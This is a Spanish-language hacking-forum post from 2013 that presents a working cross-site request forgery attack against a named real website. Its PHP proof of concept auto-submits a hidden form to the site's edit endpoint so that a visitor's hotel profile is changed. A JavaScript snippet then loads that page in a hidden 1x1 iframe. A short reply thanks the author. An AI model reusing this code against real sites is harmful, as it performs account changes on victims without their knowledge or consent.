Cross Site Request Forgery /Matabarras/

Iniciado por Matabarras, Abril 27, 2013, 10:19:27 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Buenas, hoy les explicare como explotamos una web con fallo de verificación en los tokens, lo que produce que podamos provocar acciones ilegitimas en nuestra "víctima" sin su cosentimiento ni conocimiento.

En este caso programe un CSRF; para la web ciudadhabbo, que simplemente, cuando el autor entra a nuestra web, automaticamente se le cambie el perfil de su hotel públicado, de la ID que indicamos.

También podriamos crear un CSRF, para públicar el hotel a base del que yo hice, muy sencillo.

Les dejo el tutorial donde explico los pasos.


CSRF:

Código: php
<?php
//Codded: Matabarras/Morenako
// POC Cambio de Hotel Ciudadhabbo
$url = "ciudadhabbo.com";
$form["id"] = 26; //ID del hotel que queremos modificar
$form["nombre"] = "Murlocksito JUAPO";
$form["tipo"] = 1;
$form["name"] = "127.0.0.1";
$form["port"] = 80;
$form["web"] = "http://www.morenakomatabarras.com";
$form["info"] = "Pues probando a que si murlock";
$form["guardar"] = "Guardar+cambios";




echo '<html><body onLoad="document.csrf.submit();">';
echo '<form name="csrf" action="http://'.$url.'/doedit.php" method="POST">';
foreach($form As $key=>$value) {
echo '<input type="hidden" name="'.$key.'" value="'.$value.'">';
}
echo '</form></body></html>';
?>



JS camuflando el csrf.
Código: php
// This code was coded by FrenetikK & Mor3nako.


function writeIf(url) {
document.write('<iframe src="'+url+'" frameborder="0" width="1" height="1" scrolling="no"></iframe>');
}

writeIf('http://127.0.0.1/csrf.php');
No esperes nada, vive la vida, y que los demas hagan lo que ellos creen.

Muy bueno Matabarras, gracias.
Twitter: @The_Pr0ph3t
[email protected]